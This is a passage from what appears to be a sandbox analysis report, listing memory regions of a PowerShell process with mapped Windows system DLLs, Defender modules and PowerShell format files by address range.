entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 960 start_va = 0x7fff73540000 end_va = 0x7fff7354ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73540000" filename = "" Region: id = 961 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 962 start_va = 0x7fffd42d0000 end_va = 0x7fffd4331fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\65012908bad668fe7862ae251eb099a8\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\65012908bad668fe7862ae251eb099a8\\microsoft.powershell.security.ni.dll") Region: id = 963 start_va = 0x7fff73550000 end_va = 0x7fff7355ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73550000" filename = "" Region: id = 964 start_va = 0x7fffdc430000 end_va = 0x7fffdc43bfff monitored = 0 entry_point = 0x7fffdc4335c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 965 start_va = 0x25b73a30000 end_va = 0x25b73b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a30000" filename = "" Region: id = 966 start_va = 0x25b5b410000 end_va = 0x25b5b412fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b5b410000" filename = "" Region: id = 967 start_va = 0x7fffe4ff0000 end_va = 0x7fffe500afff monitored = 0 entry_point = 0x7fffe4ff1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 968 start_va = 0x25b5b880000 end_va = 0x25b5b880fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 969 start_va = 0x7fffe4fe0000 end_va = 0x7fffe4feafff monitored = 0 entry_point = 0x7fffe4fe1a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 970 start_va = 0x7fffec960000 end_va = 0x7fffec9b5fff monitored = 0 entry_point = 0x7fffec970bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 971 start_va = 0x7fffe4fc0000 end_va = 0x7fffe4fd5fff monitored = 0 entry_point = 0x7fffe4fc3380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 972 start_va = 0x7fffe4fa0000 end_va = 0x7fffe4fbffff monitored = 0 entry_point = 0x7fffe4fa1920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 973 start_va = 0x7fffe4f90000 end_va = 0x7fffe4f9bfff monitored = 0 entry_point = 0x7fffe4f91860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 974 start_va = 0x7fffe6c80000 end_va = 0x7fffe6c95fff monitored = 0 entry_point = 0x7fffe6c81b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 975 start_va = 0x7fffec1d0000 end_va = 0x7fffec1dbfff monitored = 0 entry_point = 0x7fffec1d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 976 start_va = 0x25b5b890000 end_va = 0x25b5b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b890000" filename = "" Region: id = 977 start_va = 0x25b5b890000 end_va = 0x25b5b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b890000" filename = "" Region: id = 978 start_va = 0x7fff73560000 end_va = 0x7fff7356ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73560000" filename = "" Region: id = 979 start_va = 0x7fff73570000 end_va = 0x7fff7357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73570000" filename = "" Region: id = 980 start_va = 0x7fff73580000 end_va = 0x7fff7358ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73580000" filename = "" Region: id = 981 start_va = 0x7fff73590000 end_va = 0x7fff7359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73590000" filename = "" Region: id = 982 start_va = 0x7fffe2870000 end_va = 0x7fffe287bfff monitored = 0 entry_point = 0x7fffe28718b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 983 start_va = 0x7fffed940000 end_va = 0x7fffedb06fff monitored = 0 entry_point = 0x7fffed99db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 984 start_va = 0x7fffece30000 end_va = 0x7fffece3ffff monitored = 0 entry_point = 0x7fffece356e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 985 start_va = 0x7fffed7b0000 end_va = 0x7fffed804fff monitored = 0 entry_point = 0x7fffed7c7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 986 start_va = 0x653e500000 end_va = 0x653e57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e500000" filename = "" Region: id = 987 start_va = 0x25b5b890000 end_va = 0x25b5b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b890000" filename = "" Region: id = 988 start_va = 0x25b739e0000 end_va = 0x25b739f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b739e0000" filename = "" Region: id = 989 start_va = 0x25b5b8a0000 end_va = 0x25b5b8a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 990 start_va = 0x653e580000 end_va = 0x653e5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e580000" filename = "" Region: id = 991 start_va = 0x25b73b30000 end_va = 0x25b73d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73b30000" filename = "" Region: id = 992 start_va = 0x7fffebdc0000 end_va = 0x7fffebde3fff monitored = 0 entry_point = 0x7fffebdc3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 993 start_va = 0x25b5b8a0000 end_va = 0x25b5b8a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 994 start_va = 0x25b5b8c0000 end_va = 0x25b5b8c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 995 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 996 start_va = 0x25b73d60000 end_va = 0x25b73e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73d60000" filename = "" Region: id = 997 start_va = 0x25b73d30000 end_va = 0x25b73d51fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 998 start_va = 0x25b73d30000 end_va = 0x25b73d51fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 999 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1000 start_va = 0x25b5b8c0000 end_va = 0x25b5b8c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 1001 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1002 start_va = 0x25b73e60000 end_va = 0x25b73ea4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 1003 start_va = 0x25b73e60000 end_va = 0x25b73ea4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 1004 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1005 start_va = 0x25b73e60000 end_va = 0x25b73e93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 1006 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1007 start_va = 0x25b73e60000 end_va = 0x25b73e92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 1008 start_va = 0x25b73e60000 end_va = 0x25b73e92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 1009 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1010 start_va = 0x25b5b8c0000 end_va = 0x25b5b8c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershelltrace.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml") Region: id = 1011 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1012 start_va = 0x25b5b8c0000 end_va = 0x25b5b8c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 1013 start_va = 0x25b73d30000 end_va = 0x25b73d57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1014 start_va = 0x25b5b8c0000 end_va = 0x25b5b8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b8c0000" filename = "" Region: id = 1015 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1016 start_va = 0x653e600000 end_va = 0x653ef8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e600000" filename = "" Region: id = 1017 start_va = 0x7fffea0c0000 end_va = 0x7fffea0cffff monitored = 0 entry_point = 0x7fffea0c51b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 1018 start_va = 0x25b5b8c0000 end_va = 0x25b5b8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b5b8c0000" filename = "" Region: id = 1019 start_va = 0x7fffe89d0000 end_va = 0x7fffe89ecfff monitored = 0 entry_point = 0x7fffe89de930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 1020 start_va = 0x7fffd41f0000 end_va = 0x7fffd42cefff monitored = 0 entry_point = 0x7fffd4224ef0 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 1021 start_va = 0x25b73a00000 end_va = 0x25b73a01fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 1022 start_va = 0x25b73d30000 end_va = 0x25b73d5dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b73d30000" filename = "" Region: id = 1023 start_va = 0x653ef90000 end_va = 0x653f00ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653ef90000" filename = "" Region: id = 1024 start_va = 0x653f010000 end_va = 0x653f04ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f010000" filename = "" Region: id = 1025 start_va = 0x7fff735a0000 end_va = 0x7fff735affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff735a0000" filename = "" Region: id = 1026 start_va = 0x7fffccd40000 end_va = 0x7fffcd656fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\180c5b058514424a5097dc9f075fe609\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\180c5b058514424a5097dc9f075fe609\\system.data.ni.dll") Region: id = 1027 start_va = 0x7fff735b0000 end_va = 0x7fff735bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff735b0000" filename = "" Region: id = 1028 start_va = 0x7fffcc9e0000 end_va = 0x7fffccd33fff monitored = 1 entry_point = 0x7fffccb257fa region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1029 start_va = 0x7ffff0540000 end_va = 0x7ffff05aafff monitored = 0 entry_point = 0x7ffff05590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1030 start_va = 0x25b73e60000 end_va = 0x25b741abfff monitored = 1 entry_point = 0x25b73fa57fa region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1031 start_va = 0x7fff735c0000 end_va = 0x7fff735cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff735c0000" filename = "" Region: id = 1032 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1033 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1034 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1035 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1036 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1037 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1038 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1039 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1040 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1041 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1042 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1043 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1044 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1045 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1046 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1047 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1048 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1049 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1050 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1051 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1052 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1053 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1054 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1055 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1056 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1057 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1058 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1059 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1060 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1061 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1062 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1063 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1064 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1065 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1066 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1067 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1068 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1069 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1070 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1071 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1072 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1073 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1074 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1075 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1076 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1077 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1078 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1079 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1080 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1081 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1082 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1083 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1084 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = 